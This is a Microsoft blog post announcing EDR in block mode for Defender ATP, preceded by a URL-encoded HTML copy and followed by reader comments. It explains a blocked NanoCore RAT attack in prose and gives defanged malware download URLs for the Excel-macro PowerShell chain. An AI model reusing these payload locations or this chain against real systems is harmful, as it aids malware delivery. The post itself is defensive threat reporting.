%3CLINGO-SUB%20id%3D%22lingo-sub-1596617%22%20slang%3D%22en-US%22%3EIntroducing%20EDR%20in%20block%20mode%3A%20Stopping%20attacks%20in%20their%20tracks%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-1596617%22%20slang%3D%22en-US%22%3E%3CP%3E%3CSTRONG%3EEndpoint%20detection%20and%20response%20(EDR)%20in%20block%20mode%3C%2FSTRONG%3E%20is%20a%20new%20capability%20in%20Microsoft%20Defender%20Advanced%20Threat%20Protection%20(%3CA%20href%3D%22https%3A%2F%2Fwww.microsoft.com%2Fen-us%2FWindowsForBusiness%2Fwindows-atp%22%20target%3D%22_blank%22%20rel%3D%22noopener%20noopener%20noreferrer%20noopener%20noreferrer%22%3EMicrosoft%20Defender%20ATP%3C%2FA%3E)%20that%20turns%20EDR%20detections%20into%20blocking%20and%20containment%20of%20malicious%20behaviors.%20This%20capability%20uses%20Microsoft%20Defender%20ATP%E2%80%99s%20industry-leading%20visibility%20and%20detection%20capability%20to%20provide%20an%20additional%20layer%20of%20post-breach%20blocking%20of%20malicious%20behavior%2C%20malware%2C%20and%20other%20artifacts%20that%20your%20primary%20antivirus%20solution%20might%20miss.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EThrough%20built-in%20machine%20learning%20models%20in%20Microsoft%20Defender%20ATP%2C%20EDR%20in%20block%20mode%20extends%20-ERR%3AREF-NOT-FOUND-behavioral%20blocking%20and%20containment%2C%20which%20uses%20machine%20learning-driven%20protection%20engines%20that%20specialize%20in%20detecting%20threats%20by%20analyzing%20behavior.%20The%20ability%20of%20this%20feature%20to%20detect%20and%20stop%20threats%20in%20real%20time%2C%20even%20after%20they%20have%20started%20running%2C%20empowers%20organizations%20to%20thwart%20cyberattacks%2C%20maintain%20security%20posture%2C%20and%20reduce%20the%20manual%20steps%20and%20time%20to%20respond%20to%20threats.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EWhen%20EDR%20in%20block%20mode%20detects%20malicious%20behaviors%20or%20artifacts%2C%20it%20stops%20related%20running%20processes%2C%20blocking%20the%20attack%20from%20progressing.%20These%20blocks%20are%20reported%20in%20Microsoft%20Defender%20Security%20Center%2C%20where%20security%20teams%20can%20see%20details%20of%20the%20threat%20and%20remediation%20status%2C%20and%20use%20Microsoft%20Defender%20ATP%E2%80%99s%20rich%20set%20of%20capabilities%20to%20further%20investigate%20and%20hunt%20for%20similar%20threats%20as%20necessary.%3C%2FP%3E%0A%3CDIV%20id%3D%22tinyMceEditorShweta%20Jha_0%22%20class%3D%22mceNonEditable%20lia-copypaste-placeholder%22%3E%26nbsp%3B%3C%2FDIV%3E%0A%3CDIV%20id%3D%22tinyMceEditorShweta%20Jha_1%22%20class%3D%22mceNonEditable%20lia-copypaste-placeholder%22%3E%26nbsp%3B%3C%2FDIV%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22alert.png%22%20style%3D%22width%3A%20999px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213105iAEC61541F35C10C2%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22alert.png%22%20alt%3D%22alert.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%201.%20Sample%20Microsoft%20Defender%20ATP%20alert%20on%20threat%20caught%20by%20EDR%20in%20block%20mode%3C%2FEM%3E%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EEDR%20in%20block%20mode%20was%20developed%20in%20close%20collaboration%20with%20customers%2C%20and%20is%20in%20-ERR%3AREF-NOT-FOUND-public%20preview%20starting%20today.%20We%20thank%20our%20customers%20for%20the%20partnership%20and%20for%20the%20invaluable%20feedback%20during%20the%20limited%20preview%2C%20during%20which%20the%20feature%20blocked%20multiple%20real-world%20attacks.%20In%20this%20blog%2C%20we%E2%80%99ll%20share%20details%20about%20one%20of%20these%20attacks.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CH2%20id%3D%22toc-hId--1293453447%22%20id%3D%22toc-hId--1293453447%22%3EEDR%20block%20mode%20in%20action%3C%2FH2%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EIn%20April%20of%20this%20year%2C%20EDR%20in%20block%20mode%20protected%20and%20blocked%20a%20NanoCore%20RAT%20attack%20that%20aimed%20to%20steal%20credentials%2C%20spy%20using%20a%20device%E2%80%99s%20camera%2C%20and%20pilfer%20other%20information.%20The%20attack%20started%20with%20a%20spear-phishing%20email%20carrying%20a%20malicious%20Excel%20attachment.%20The%20Excel%20file%20contained%20a%20malicious%20macro%20that%2C%20when%20enabled%2C%20ran%20a%20PowerShell%20code%20that%20in%20turn%20downloaded%20and%20ran%20a%20file%20from%20%3CEM%3Ehxxp%3A%2F%2Foffice-services-labs%5B.%5Dcom%2FScan.exe%3C%2FEM%3E.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22excel.png%22%20style%3D%22width%3A%20780px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213107i5FF48456A0BA145B%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22excel.png%22%20alt%3D%22excel.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%202.%20Malicious%20Excel%20file%20used%20in%20NanoCore%20campaign%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EThe%20organization%E2%80%99s%20non-Microsoft%20antivirus%20solution%20didn%E2%80%99t%20detect%20the%20Excel%20file%20or%20its%20behavior%2C%20but%20Microsoft%20Defender%20ATP%20did.%20EDR%20in%20block%20mode%20kicked%20in%2C%20stopping%20the%20download%20behavior%20and%20blocking%20the%20PowerShell%20code%20and%20Excel%20file.%20This%20was%20reported%20in%20the%20Microsoft%20Defender%20Security%20Center%2C%20alerting%20the%20security%20team%20about%20the%20blocked%20behavior.%20While%20the%20threat%20was%20automatically%20remediated%2C%20the%20alert%20empowers%20the%20security%20team%20to%20perform%20additional%20investigation%20and%20hunting%20for%20similar%20threats.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-center%22%20image-alt%3D%22Fig3-Microsoft-Defender-ATP-alert-Nano-Core.png%22%20style%3D%22width%3A%20999px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213117iC620AC63CAD232FB%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22Fig3-Microsoft-Defender-ATP-alert-Nano-Core.png%22%20alt%3D%22Fig3-Microsoft-Defender-ATP-alert-Nano-Core.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3CEM%20style%3D%22font-family%3A%20inherit%3B%22%3EFigure%203.%20EDR%20in%20block%20mode%20alert%20in%20Microsoft%20Defender%20Security%20Center%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EHad%20the%20attack%20been%20allowed%20to%20continue%2C%20the%20downloaded%20file%20%3CEM%3EScan.exe%3C%2FEM%3E%20would%20have%20run%20the%20following%20PowerShell%20commands%2C%20which%20would%20have%20downloaded%20the%20payload%2C%20a%20NanoCore%20variant%2C%20from%20%3CEM%3Ehxxp%3A%2F%2Fpaste%5B.%5Dee%2Fr%2FPym5k%3C%2FEM%3E%3A%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-center%22%20image-alt%3D%22script.png%22%20style%3D%22width%3A%20780px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213109i4E9C5C593BE3111D%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22script.png%22%20alt%3D%22script.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%204.%20Malicious%20PowerShell%20commands%20used%20by%20NanoCore%20campaign%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ENanoCore%20is%20a%20family%20of%20remote%20access%20Trojans%20(RAT)%20that%20gather%20info%20about%20the%20affected%20device%20and%20operating%20system.%20It%20is%20designed%20to%20steal%20credentials%2C%20spy%20through%20cameras%2C%20and%20carry%20out%20other%20malicious%20activities.%20With%20EDR%20in%20block%20mode%2C%20Microsoft%20Defender%20ATP%20protected%20against%20the%20damaging%20impact%20of%20a%20successful%20NanoCore%20infection.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22kill%20chain.png%22%20style%3D%22width%3A%20975px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213110i80BFDBF872F0820B%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22kill%20chain.png%22%20alt%3D%22kill%20chain.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%205.%20NanoCore%20RAT%20attack%20chain%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CH2%20id%3D%22toc-hId-1194059386%22%20id%3D%22toc-hId-1194059386%22%3ETurning%20on%20EDR%20in%20block%20mode%3C%2FH2%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EEDR%20in%20block%20mode%20is%20in%20public%20preview%20starting%20today%2C%20so%20if%20you%20have%20-ERR%3AREF-NOT-FOUND-preview%20features%20turned%20on%20in%20Microsoft%20Defender%20Security%20Center%2C%20you%20can%20try%20it%20now.%20Once%20you%E2%80%99ve%20opted%20in%2C%20turning%20on%20EDR%20in%20block%20mode%20is%20simple.%20Go%20to%20Settings%20%26gt%3B%20Advanced%20features.%20Switch%20the%20toggle%20for%20%E2%80%9CEnable%20EDR%20in%20block%20mode%E2%80%9D%20to%20On.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22setting.png%22%20style%3D%22width%3A%20999px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213111iC0938E8533DA6415%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22setting.png%22%20alt%3D%22setting.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%206.%20Microsoft%20Defender%20Security%20Center%20Advanced%20features%20settings%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ESecurity%20teams%20are%20also%20informed%20about%20this%20feature%20via%20the%20security%20recommendation%20titled%2C%20%E2%80%9CEnable%20EDR%20in%20block%20mode%E2%80%9D%20in%20threat%20and%20vulnerability%20management.%3C%2FP%3E%0A%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22TVM.png%22%20style%3D%22width%3A%20999px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213112i6943024445437B23%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22TVM.png%22%20alt%3D%22TVM.png%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%3CEM%3EFigure%207.%20EDR%20in%20block%20mode%20in%20security%20recommendations%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ETo%20learn%20more%20about%20the%20behavioral%20blocking%20and%20containment%20capabilities%20in%20Microsoft%20Defender%20ATP%20watch%20this%20-ERR%3AREF-NOT-FOUND-SANS%20Webcast%2C%20refer%20to%20our%20-ERR%3AREF-NOT-FOUND-documentation%3CSPAN%3E%2C%3C%2FSPAN%3E%20and%20read%20this%20-ERR%3AREF-NOT-FOUND-blog.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EIf%20you%E2%80%99re%20not%20yet%20taking%20advantage%20of%20Microsoft%E2%80%99s%20industry-leading%20security%20optics%20and%20detection%20capabilities%20for%20endpoints%2C%20-ERR%3AREF-NOT-FOUND-sign%20up%20for%20a%20free%20trial%20of%20Microsoft%20Defender%20ATP%20today.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EWe%20welcome%20your%20feedback.%20If%20you%20have%20any%20comments%20or%20questions%2C%20let%20us%20know.%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%3CSTRONG%3E%3CEM%3EJeong%20Mun%20and%20Shweta%20Jha%20%3C%2FEM%3E%3C%2FSTRONG%3E%3C%2FP%3E%0A%3CP%3E%3CEM%3EMicrosoft%20Defender%20ATP%20team%3C%2FEM%3E%3C%2FP%3E%0A%3CP%20class%3D%22lia-align-center%22%3E%26nbsp%3B%3C%2FP%3E%3C%2FLINGO-BODY%3E%3CLINGO-TEASER%20id%3D%22lingo-teaser-1596617%22%20slang%3D%22en-US%22%3E%3CP%3E%3CSPAN%20class%3D%22lia-inline-image-display-wrapper%20lia-image-align-inline%22%20image-alt%3D%22Capture.JPG%22%20style%3D%22width%3A%20999px%3B%22%3E%3CIMG%20src%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fimage%2Fserverpage%2Fimage-id%2F213116iF2E4B053414F8F86%2Fimage-size%2Flarge%3Fv%3D1.0%26amp%3Bpx%3D999%22%20title%3D%22Capture.JPG%22%20alt%3D%22Capture.JPG%22%20%2F%3E%3C%2FSPAN%3E%3C%2FP%3E%3C%2FLINGO-TEASER%3E
Microsoft

Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.

 

Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.

 

When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.

 
 

alert.png

Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode

 

EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.

 

EDR block mode in action

 

In April of this year, EDR in block mode protected and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran a PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.

 

Fig2-malicious-Excel-file.png

Figure 2. Malicious Excel file used in NanoCore campaign

 

The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.

 

Fig3-Microsoft-Defender-ATP-alert-Nano-Core.png

 Figure 3. EDR in block mode alert in Microsoft Defender Security Center

 

Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:

 

Fig4-PowerShell.png

Figure 4. Malicious PowerShell commands used by NanoCore campaign

 

NanoCore is a family of remote access Trojans (RAT) that gather info about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.

 

kill chain.png

Figure 5. NanoCore RAT attack chain

 

Turning on EDR in block mode

 

EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.

 

setting.png

Figure 6. Microsoft Defender Security Center Advanced features settings

 

Security teams are also informed about this feature via the security recommendation titled, “Enable EDR in block mode” in threat and vulnerability management.

TVM.png

Figure 7. EDR in block mode in security recommendations

 

To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP watch this SANS Webcast, refer to our documentation, and read this blog.

 

If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.

 

We welcome your feedback. If you have any comments or questions, let us know.

 

 

Jeong Mun and Shweta Jha

Microsoft Defender ATP team

 

9 Comments
Occasional Contributor

This. Is. Awesome!

Occasional Contributor

Hi all,

I would like to ask one question about this feature - what if you're utilizing ASR rules in a strict way - Block Mode and very less exclusions - wouldn’t exploit guard have stopped this particular explained behavior, in your blog post, upfront? would there be a chance of getting conflicts among the two block modes? thank you

Microsoft

@Thomas Höhner - Thanks for posting your question, good one! At the moment you would need Microsoft Defender AV in Active mode to leverage ASR rules. Benefits of EDR block is primarily focused (but not limited) towards the situation where you are running some other AV as primary. 

Occasional Contributor

Hi. Is there any way to enable for a subset of endpoints? We would like to try out on a device group before we enable organization wide (and required by change management). According to Endpoint detection and response in block mode - Windows security | Microsoft Docs EDR Block Mode can only be enabled in Security Center - would be great if we can configure per group like with automation levels.

Occasional Visitor

@Shweta Jha So this is for organisations that dont have windows defender as their primary antivirus ?

Occasional Contributor

@Shweta Jha 

Hi,

found this one from the ms docs - https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/edr-in-bl...

it clearly states that defender and cloud protection must/should be up and running...

Didn't had much to deal with 3rd party AVs last years, but we still have customers utilizing other AVs - so is it supported even without defender AV or not?

thank you for clarification

thomas

Microsoft

@PHancke Thanks for feedback. Great suggestion, we will consider this while planning our roadmap. will keep you posted. 

Microsoft

@Peter_Kirk - Yes. You can turn on this feature to provide additional layer of post breach protection for the devices not having Microsoft Defender AV as primary AV. Please keep in mind ideally we want our customers to be on full stack MDATP (primary defender AV and EDR) to get best protection, detection and response values.  :)

Microsoft

@Thomas Höhner - when 3rd party AV is installed and device is onboarded to MDATP, Microsoft Defender AV automatically moves into passive mode (not performing active prevention and block). Defender AV needs to remain in passive mode with CDP to use this feature.